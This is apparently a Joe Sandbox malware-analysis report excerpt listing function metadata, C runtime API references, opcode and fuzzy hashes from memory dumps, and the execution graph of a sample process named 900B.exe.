API String ID: 3455034128-2366072709
Opcode ID: 0da551da4dec862d04427afc1448beefefa974af13e610212c996657d24ce15e
Instruction ID: 62ad9c785d221e5c00ffa65a97d7f62d947cc529f609b8795f9a55a19a6e0c30
Opcode Fuzzy Hash: 0da551da4dec862d04427afc1448beefefa974af13e610212c996657d24ce15e
Instruction Fuzzy Hash: 14F15BB1E002299FDB24CF54DC81BAEB7B5BF85305F5041AAE109AB241D738AE84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF57 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0041BF5B
__get_printf_count_output.LIBCMTD ref: 0041BF69
__errno.LIBCMTD ref: 0041BFCF
__invalid_parameter.LIBCMTD ref: 0041BFF0
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041C005
_write_multi_char.LIBCMTD ref: 0041C57E
_write_multi_char.LIBCMTD ref: 0041C5C5
_wctomb_s.LIBCMTD ref: 0041C642

Strings

-, xrefs: 0041C51E

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s
String ID: -
API String ID: 3485403616-2547889144
Opcode ID: c4689f47102e2fffd20a84aebc8cb3fc6401d55190ec87416caf6d3719635920
Instruction ID: 20aea1e434da3f91db583703a55d6725de54bea7f50346c70a74c09eb3d77303
Opcode Fuzzy Hash: c4689f47102e2fffd20a84aebc8cb3fc6401d55190ec87416caf6d3719635920
Instruction Fuzzy Hash: 53A18AB1D412299BDB24DF54CC89BEEB7B5EB48304F1081EAE0197A281D7789EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3A5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 105windowCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMTD ref: 0040F470

Part of subcall function 0041AFD0: __vsnwprintf_s_l.LIBCMTD ref: 0041AFF2

__errno.LIBCMTD ref: 0040F49B
__invoke_watson_if_oneof.LIBCMTD ref: 0040F4A3
__errno.LIBCMTD ref: 0040F4AB
_wcscpy_s.LIBCMTD ref: 0040F4E5
__invoke_watson_if_error.LIBCMTD ref: 0040F4EE
___crtMessageBoxW.LIBCMTD ref: 0040F507

Strings

T9@, xrefs: 0040F3E8
}*j, xrefs: 0040F47F
hp7@, xrefs: 0040F4FB
}8j, xrefs: 0040F4BC
h9@, xrefs: 0040F42F, 0040F435
x9@, xrefs: 0040F421, 0040F427

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __errno$Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s__vsnwprintf_s_l_wcscpy_s
String ID: T9@$h9@$hp7@$x9@$}*j$}8j
API String ID: 976542199-2627948063
Opcode ID: 13c7e32cdffca0c770453bdd792105fcb1c5b95bd883272c378d493fc4793306
Instruction ID: f25dcdb8b469caa85835e8492b42eb4c13ddbad2c26898e74d5b410cc00a1a38
Opcode Fuzzy Hash: 13c7e32cdffca0c770453bdd792105fcb1c5b95bd883272c378d493fc4793306
Instruction Fuzzy Hash: A94192B1E40218BBCB24EFD4DC49B9A77B8AB48705F1081BAB508772C1C2795BC8CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042315A Relevance: 19.7, APIs: 13, Instructions: 238COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042315E
__get_printf_count_output.LIBCMTD ref: 0042316C
__errno.LIBCMTD ref: 004231D2
__invalid_parameter.LIBCMTD ref: 004231F3
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00423208
_write_multi_char.LIBCMTD ref: 0042379B
_write_string.LIBCMTD ref: 004237B6
_write_multi_char.LIBCMTD ref: 004237E2
__mbtowc_l.LIBCMTD ref: 00423851

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
String ID:
API String ID: 3689974179-0
Opcode ID: 91734103a5b45529ddf93585fc36ab443d0c86bba5418dc8393b7d3852622bab
Instruction ID: ee6cb6e549d8fbc35da53921bb9b7c477b183efa44a0ba4a4046472b6b535aab
Opcode Fuzzy Hash: 91734103a5b45529ddf93585fc36ab443d0c86bba5418dc8393b7d3852622bab
Instruction Fuzzy Hash: A0A190F1A002299BDF24DF45DC85BAEB774AB44305F50809AE6097B282D77C6E84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDA5 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0041BDA9
_strlen.LIBCMT ref: 0041BDD9
_write_multi_char.LIBCMTD ref: 0041C57E
_write_multi_char.LIBCMTD ref: 0041C5C5
_wctomb_s.LIBCMTD ref: 0041C642

Strings

45@, xrefs: 0041BDCC
-, xrefs: 0041C51E

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s
String ID: -$45@
API String ID: 1884575355-665643691
Opcode ID: 1b3a0d8cb25fc75224e6cb703063f3e1aedd6af7b9cfa12504841567bb160c17
Instruction ID: 0f3152ffcb35c9a7637fc65632e0fef91a9a427d64a02603f4c9143c0e8e57a7
Opcode Fuzzy Hash: 1b3a0d8cb25fc75224e6cb703063f3e1aedd6af7b9cfa12504841567bb160c17
Instruction Fuzzy Hash: 66A179B0D412299BDB24DF54CC89BEEB7B5EB48305F1081DAE019AB291D7789EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00422F84 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 222COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 00422F88
_strlen.LIBCMT ref: 00422FB8
_write_multi_char.LIBCMTD ref: 0042379B
_write_string.LIBCMTD ref: 004237B6
_write_multi_char.LIBCMTD ref: 004237E2
__mbtowc_l.LIBCMTD ref: 00423851

Strings

45@, xrefs: 00422FAB

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
String ID: 45@
API String ID: 909868375-147724152
Opcode ID: d68c5ff9bca7064516218a99dcf43f12b5b549a0f9ad50d4e45b230146a64f24
Instruction ID: e1e104b59482d837e7504534d3b14afad4f059c5549127bae7ec85c9e381ed6f
Opcode Fuzzy Hash: d68c5ff9bca7064516218a99dcf43f12b5b549a0f9ad50d4e45b230146a64f24
Instruction Fuzzy Hash: 1EA181F1E001289BDB24DF54DC85BAEB7B5AB44305F40819AE5096B281D77C5E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00420426 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00420488
__errno.LIBCMTD ref: 00420490
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042049D
_memset.LIBCMT ref: 00420524
__errno.LIBCMTD ref: 00420563
__invalid_parameter.LIBCMTD ref: 00420584
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00420596
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004205D1

Strings

P, xrefs: 004205A6
", xrefs: 0042058C

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: Locale$UpdateUpdate::~_$__errno_memset$__invalid_parameter
String ID: "$P
API String ID: 150879229-1577843662
Opcode ID: c1f1f5889b3313e224744b44ead36d1a46020edcb27e6b0eb7e7764d942b7136
Instruction ID: f68c81728803cca50579f650bef9d52a8e579a7357720fd5a55f76474518abe9
Opcode Fuzzy Hash: c1f1f5889b3313e224744b44ead36d1a46020edcb27e6b0eb7e7764d942b7136
Instruction Fuzzy Hash: E4514D70E00219EFCB24DF58E845AAE77B1FF44314F50862AE825673D2D738A996CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0040B405 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264memoryCOMMON

Download Yara Rule

APIs

_CheckBytes.LIBCMTD ref: 0040B419
__errno.LIBCMTD ref: 0040B444
__CrtIsValidHeapPointer.LIBCMTD ref: 0040B4A5
_CheckBytes.LIBCMTD ref: 0040B550
_CheckBytes.LIBCMTD ref: 0040B60A
_memset.LIBCMT ref: 0040B701
__free_base.LIBCMTD ref: 0040B70D

Strings

tDj, xrefs: 0040B45B

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: BytesCheck$HeapPointerValid__errno__free_base_memset
String ID: tDj
API String ID: 2211402958-2513116121
Opcode ID: a952c0d9f5c8382168a6b6c26efdf02f6aebe0f3f2b371b7ba49fb669f4b5643
Instruction ID: 8f22a8178101f7e6220e9dcae2d10830f871193a180613df78e169cc5279629e
Opcode Fuzzy Hash: a952c0d9f5c8382168a6b6c26efdf02f6aebe0f3f2b371b7ba49fb669f4b5643
Instruction Fuzzy Hash: A4918F71A40204BBEB24DB84DD86F6A7365EB44708F3441A9F604BA3D2D379EE41CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCE7 Relevance: 13.6, APIs: 9, Instructions: 105COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 0040CCEE

Part of subcall function 00411250: __crt_wait_module_handle.LIBCMTD ref: 0041129C

__encode_pointer.LIBCMTD ref: 0040CD72
__encode_pointer.LIBCMTD ref: 0040CD0A

Part of subcall function 00411230: __encode_pointer.LIBCMTD ref: 00411237

__encode_pointer.LIBCMTD ref: 0040CD91
__encode_pointer.LIBCMTD ref: 0040CDA2
__initterm.LIBCMTD ref: 0040CDE4
__initterm.LIBCMTD ref: 0040CDF6
__CrtSetDbgFlag.LIBCMTD ref: 0040CE09
___freeCrtMemory.LIBCMTD ref: 0040CE20

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __encode_pointer$__initterm$FlagMemory___free__crt_wait_module_handle
String ID:
API String ID: 3592632019-0
Opcode ID: 2dfd3b04cc4a1f39a205c9d73b47653ab33d46f8aea9614e1c73a756be20bd83
Instruction ID: 3cfa9af71cd33ffa6fe558611b9f0e6c6912b9b5cb862b10129475167383c673
Opcode Fuzzy Hash: 2dfd3b04cc4a1f39a205c9d73b47653ab33d46f8aea9614e1c73a756be20bd83
Instruction Fuzzy Hash: CB411DB5D00208DBDB14DFA5D8D1ADEBBB1EF48314F24823AE415B7390D7396981CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E808 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040E869
__aullrem.LIBCMT ref: 0040EA36
__aulldiv.LIBCMT ref: 0040EA58

Strings

0, xrefs: 0040E824
9, xrefs: 0040EA69
', xrefs: 0040E808

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: 54e776a26645d3dd7c4f5de35514bc97ffcf545b6fde0bbd0a4d7381a8d536f2
Instruction ID: 999b98fb8c7298e2fecd423b878867e7ed16e3dd10ee8ccc22dce97580df4d8f
Opcode Fuzzy Hash: 54e776a26645d3dd7c4f5de35514bc97ffcf545b6fde0bbd0a4d7381a8d536f2
Instruction Fuzzy Hash: 794138B1D04229CFDB60DF4AC989BAEB7B5BB44300F1049EAD048B7281C7389E91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0041C227 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0041C288
__aullrem.LIBCMT ref: 0041C455
__aulldiv.LIBCMT ref: 0041C477

Strings

', xrefs: 0041C227
9, xrefs: 0041C488
0, xrefs: 0041C243

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: b533f03726811cb36025c7b2a42b992821157cc5ceeb554e34c0b73c4861ca40
Instruction ID: 83be82029f207e946626df9975687eb8c20f1560cf7cb7420df4ce6db86a2dad
Opcode Fuzzy Hash: b533f03726811cb36025c7b2a42b992821157cc5ceeb554e34c0b73c4861ca40
Instruction Fuzzy Hash: 7B41C0B1D05229DFEB24CF98CC99BEEB7B5BB44304F24819AE419A7240C7389E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0041C214 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0041C288
__aullrem.LIBCMT ref: 0041C455
__aulldiv.LIBCMT ref: 0041C477

Strings

9, xrefs: 0041C488
0, xrefs: 0041C243

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: 12e61f45dd5dc814ab682159396d5639ef33753a08743e4182718c821c33b756
Instruction ID: 1c28961741ecbaa86624a83dbd5a07abc391f185ed774a2f5a8a16e7b4a5c358
Opcode Fuzzy Hash: 12e61f45dd5dc814ab682159396d5639ef33753a08743e4182718c821c33b756
Instruction Fuzzy Hash: 4241C0B1D15229DFEB24CF98CCD9BEEB7B5BB44304F24819AE419A7240C7389A85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040E869
__aullrem.LIBCMT ref: 0040EA36
__aulldiv.LIBCMT ref: 0040EA58

Strings

0, xrefs: 0040E824
9, xrefs: 0040EA69

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: 4d6c798d8d17587dd03a2d60ce3a0c7f90b9fe9045ed1213e0fbd373363de918
Instruction ID: b92376609688670c7e3961e508d6241c16968a634c878d17c113e96c6e52a278
Opcode Fuzzy Hash: 4d6c798d8d17587dd03a2d60ce3a0c7f90b9fe9045ed1213e0fbd373363de918
Instruction Fuzzy Hash: 9E4138B1D04229CFDB60DF4AC989BAEB7B5BB44300F1089EAD448B7291C7389E91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00423429 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00423490
__aullrem.LIBCMT ref: 00423660
__aulldiv.LIBCMT ref: 00423682

Strings

', xrefs: 00423429
9, xrefs: 00423693

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: 169aff6671f9313a680a145ee6d7ef44023d1f470a3c21be42b5d24018d2f572
Instruction ID: dafcd783e9301bd39f279c922ff53285d0df72767d771a73f71fb2b87dee5b66
Opcode Fuzzy Hash: 169aff6671f9313a680a145ee6d7ef44023d1f470a3c21be42b5d24018d2f572
Instruction Fuzzy Hash: 3E4115B1E10129AFDB24CF48D881BAEB7B5FF85315F5040AAD248AB340D7389E81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00420303 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00420354
__errno.LIBCMTD ref: 004203CC
__invalid_parameter.LIBCMTD ref: 004203ED
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004203FF

Strings

u!hXx@, xrefs: 004203A3

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: Locale$UpdateUpdate::~___errno__invalid_parameter_memset
String ID: u!hXx@
API String ID: 356215427-462105071
Opcode ID: dc7e206e5030c0d04b92983ce4c6d356c3b258e488b63ec482e4c58a02224557
Instruction ID: 972adf7f6301b2c5ed50f1b6cdc5207a5d1bc5990b70fa804c0a7dcdb431594f
Opcode Fuzzy Hash: dc7e206e5030c0d04b92983ce4c6d356c3b258e488b63ec482e4c58a02224557
Instruction Fuzzy Hash: BA317F70A00219DBCB24DF58D845BAE77B1BB04304F60822AEC256B2D2D779A955CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00423416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00423490
__aullrem.LIBCMT ref: 00423660
__aulldiv.LIBCMT ref: 00423682

Strings

9, xrefs: 00423693

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 23b725871bccf5c27e5dad8bb98b2624bab2190eb293eff164068b15ece5ffba
Instruction ID: df45d480d563740c06fdb6c63739f3034ad1d1df669f47bd7e3f7a5271688dec
Opcode Fuzzy Hash: 23b725871bccf5c27e5dad8bb98b2624bab2190eb293eff164068b15ece5ffba
Instruction Fuzzy Hash: BE4115B1E10129AFDB24CF48D881BAEB7B5FF85315F5041AAD148AB340D7389E85CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00423464 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00423490
__aullrem.LIBCMT ref: 00423660
__aulldiv.LIBCMT ref: 00423682

Strings

9, xrefs: 00423693

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 82dc154666f3e64ee63cfce9a6428573f9608a50a65a49c96da4ef156cc17787
Instruction ID: a39ce106d392ae72e15bb7868b1bf53a28d405a050f8026a4fb258c9dddafa84
Opcode Fuzzy Hash: 82dc154666f3e64ee63cfce9a6428573f9608a50a65a49c96da4ef156cc17787
Instruction Fuzzy Hash: 784125B1E10129AFDB24CF48D881BAEB7B5FF85315F4045AAD248AB340C7389E80CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0040E83D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040E869
__aullrem.LIBCMT ref: 0040EA36
__aulldiv.LIBCMT ref: 0040EA58

Strings

9, xrefs: 0040EA69

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: c4ed0183b485bac8ac56ead1154e045f65d7a6185391f1773554547b7e6b40cd
Instruction ID: ba53d76961d864d63b492216409d86f07abe96fe029687505950fafc62fcaa94
Opcode Fuzzy Hash: c4ed0183b485bac8ac56ead1154e045f65d7a6185391f1773554547b7e6b40cd
Instruction Fuzzy Hash: 7C411BB1D04229CFDB64DF4ACD89BAEB7B5BB84300F1049AAD049B7291C7389E91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0041C25C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0041C288
__aullrem.LIBCMT ref: 0041C455
__aulldiv.LIBCMT ref: 0041C477

Strings

9, xrefs: 0041C488

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 4f84507cac35cc4b0fbe087441514c8f73c0d397b7d4b094ca4c7d88fe7328c4
Instruction ID: abe1cb3789caa31172285036e68a8f1809a52c0cbe11b998aced4ad0cba22b0a
Opcode Fuzzy Hash: 4f84507cac35cc4b0fbe087441514c8f73c0d397b7d4b094ca4c7d88fe7328c4
Instruction Fuzzy Hash: D341C1B1D15229DFEB24CB49CC99BEEB7B5BB84300F24859AE419A7240C7389A81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0042340D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00423490
_get_int64_arg.LIBCMTD ref: 004234B8
__aullrem.LIBCMT ref: 00423660
__aulldiv.LIBCMT ref: 00423682

Strings

9, xrefs: 00423693

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: d66de635ff47f4e6bab33b237b70d38c64ec8331727ae66c30ef89d55212e2e5
Instruction ID: 2dba36d7f3cccfb3b929d6e8bd0be33a75890f2d742b79a38dcf0bbc7c51080b
Opcode Fuzzy Hash: d66de635ff47f4e6bab33b237b70d38c64ec8331727ae66c30ef89d55212e2e5
Instruction Fuzzy Hash: 2841F4B1E10129AFDB24CF48D981B9EB7B5BF85315F5045EAE248AB301C7389E81CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C20B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0041C288
_get_int64_arg.LIBCMTD ref: 0041C2B0
__aullrem.LIBCMT ref: 0041C455
__aulldiv.LIBCMT ref: 0041C477

Strings

9, xrefs: 0041C488

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 46fd94558219cb7010b82255a75191d8f9373794b22735a5d1946baff17ad9cc
Instruction ID: a4c8e9c7323eb21b7705971d64fed7ace7ab66e1ca16ad76757a1d0a843a32a6
Opcode Fuzzy Hash: 46fd94558219cb7010b82255a75191d8f9373794b22735a5d1946baff17ad9cc
Instruction Fuzzy Hash: 1141C1B1D05228DFEB24CB58CCD9BEEB7B5BB44304F20819AE419A7240C7389E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040E869
_get_int64_arg.LIBCMTD ref: 0040E891
__aullrem.LIBCMT ref: 0040EA36
__aulldiv.LIBCMT ref: 0040EA58

Strings

9, xrefs: 0040EA69

Memory Dump Source

Source File: 0000000D.00000002.382447012.0000000000409000.00000020.00000001.01000000.00000008.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_409000_hcthhbi.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: c7011a80ebf6a07089807e988c132094578a4c6d773c79cce0317ca3a45baaef
Instruction ID: a10f2e0b22c10e87f4c99f522202ad43aa91e29f57fc1d773cdaee5a18c9f4f2
Opcode Fuzzy Hash: c7011a80ebf6a07089807e988c132094578a4c6d773c79cce0317ca3a45baaef
Instruction Fuzzy Hash: F14118B1E04229DFDB64DF4AC989B9EB7B5BB84300F1049EAD049B7291C7389E91CF05

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 900B.exePID: 3076, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	36
Total number of Limit Nodes:	1

Executed Functions

Function 00C6003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00C6024D

Strings

cess, xrefs: 00C6018D
kernel32.dll, xrefs: 00C6008F, 00C60095

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f73140a7a5f38b9c7a521f8c60c60d7b3a49a6088e1636df9695fc95a809ba18
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 3C526874A01229DFDB64CF58C985BA9BBB1BF09304F2480D9E94DAB351DB30AE85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00C60E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00C60223,?,?), ref: 00C60E19
SetErrorMode.KERNELBASE(00000000,?,?,00C60223,?,?), ref: 00C60E1E

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: e1985586a31a0cda9256e846b16160f23cea8a83abc0ab6e42e11d4153236ef6
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 10D0123154512877D7102A94DC09BCE7B1CDF05B62F108411FB0DE9080C7719A4046E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C61C1A Relevance: 1.3, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00C61C1A

Memory Dump Source

Source File: 00000016.00000002.485502074.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_c60000_900B.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3715042478
